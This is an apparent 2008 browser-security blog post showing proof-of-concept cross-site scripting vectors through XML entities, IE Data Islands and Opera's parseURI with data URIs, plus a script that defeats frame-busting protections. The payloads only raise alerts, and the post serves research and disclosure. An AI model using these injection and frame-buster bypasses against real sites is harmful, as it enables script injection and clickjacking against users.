November 07, 2008

Fun with XXE, Data Islands and parseURI

Intro

Since the browser that changed it all was released in early 1999 most of the major payers in this section have been toying around with XML, processing, displaying and transforming it. Thus most browsers know one or a lot more ways to fetch data from other resources, work with DTDs and entities. Some of them are being shown and explained in this article.

Code

Firefox and all other major browsers but IE implemented an XML feature called XXE - XML eXternal Entities. Securiteam wrote about this issue many years ago and it found a kind of resurrection in the Google Caja Wiki. Basicaly XXE means it's possible to define entities for complete strings and markup stripes in the DOCTYPE area of the sites header.

<!DOCTYPE xss
[
<!ENTITY x "<script>alert(this)</script>">
]
>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
&x;
</head>
</html>

Unfortunately is doesn't seem to be possible to inherit the entities from the site itself to embedded frames or IFrames. Otherwise it would have been possible to inject tons of script code with just a combination or &, some word characters and a semicolon.

Internet Explorer covers its ignorance against XXE with a feature called Data Islands. This allows to add a XML tag to the document linking to a resource containing valid XML. If the parser later on finds certain attributes in the DOM the data from the XML is being checked for a match and if everything fits right applied to the markup.

There are some basic security rules that forbid the data from the XML file to be applied to a script tag or escaping certain special chars before they are placed in the DOM - but that can be easily circumvented.

<html>
<body>
<xml id="xss" src="island.xml"></xml>
<label
onmouseover=eval(this.innerHTML)
style=color:#fff;display:block;width:100%;height:100%
datasrc=#xss
datafld=payload>

Here we can see the corresponding XML data with embedded JavaScript code. Surprisingly this time IE had problems with parsing the data when being encoded to UTF-7 - we only managed to get the script code being executed in combination with ISO or UTF-8 encoding.

<?xml version="1.0"?>
<x>
<payload>
document.write(
String.fromCharCode(
60,105,109,103,32,115,114,99,61,120,32,111,110,
101,114,114,111,114,61,97,108,101,114,116,40,34,
88,83,83,34,41,62
)
)
</payload>
</x>

When using the dataformatas parameter it's even possible to treat the incoming XML data as HTML. IE8 won't allow script tags but can be fooled to execute JavaScript code via img tag and error handler. Here's the markup:

<html>
<body>
<xml id="xss" src="island.xml"></xml>
<label dataformatas="html" datasrc="#xss" datafld="payload"></label>
</body>
</html>

Andthe corresponding Data Island code:

<?xml version="1.0"?>
<x>
   <payload>
       <![CDATA[<img src=x onerror=alert(top)>>]]>
   </payload>
</x>

Opera knows XXE as well as Safari and Chrome - but of course no Data Islands. But Opera also features another way of fetching XML content into the DOM. The function is called parseURI and is a method of the the LSParser class which is located in the document.implementation object. All those features are documented in the DOM Level 3 Load and Save specs.

<script>
var parser = document.implementation.createLSParser(1, null);
var mdlfile = parser.parseURI('data:;,<x>document.write(String.fromCharCode(88,83,83))</x>');
eval(mdlfile.documentElement.text)
</script>

The method can neither access off-domain resources nor the file system, opera: or javascript: URIs. But dataURIs are allowed and thus the content of the string to parse can be chosen quite arbitrarily. Of course this time one can go all the ways and encode the string to UTF-7, base64 or whatever is necessary.

Conclusion

One might wonder that browser vendors are each and everyone brewing their own sub-standards and XML soups. Any solution has its flaws but no one besides the Opera allows to include data which is not located on the same domain. Once parseURI can be executed combined with a dataURI the possibilities are endless - and it's very hard to determine origin and content of the payload. For all other described variants one has to have at least an XML file lying around on the same domain.

It's 2008 right now and browser vendors seems to have learned what the cross domain border is. None of the techniques was able to download content from off-domain resources - except the dataURI issue with parseURI and Opera. Opera by the way features a lot more methods and properties inside the document.implementation object which we will shed more light on in later articles.

Frame-Buster-Buster

Intro

Frame buster are great little helpers that make sure hat an applications view can't be framed. There most times a very simple check if self is type equal with top. If this is not the case top.location will be set to self.location. Pretty easy. But what possibilities are there to circumvent this technique?

top!==self?top.location.href=self.location.href:false;

Some code

The only browser that is really easy to trick into executing code disabling frame busters is Chrome - latest release. Since Webkit supports the magic setter methods like __defineSetter__ it's possible to overwrite the location.href setter. Firefox doesn't allow that anymore - but gets tame with the help of event handlers. At least the page can't be left unless the user has confirmed that action at least twice.

<html>
<head>
<script>
  try {
      location.__defineSetter__('href', function() {return false});
  } catch(e) {
      justFalse = function() {
          return false;
      }
      onbeforeunload = justFalse;
      onunload = location.href = location.href;
  }
</script>
</head>
<body>
<iframe src="framed.html"></iframe>
</body>
</html>

Conclusion

IE and Opera have done their job - and this technique can not be used to disable frame busters on framed sites. Thanks to the recently created FUD wave these topics have been resurrected and become interesting again. Reminds of AJAX and JavaScript.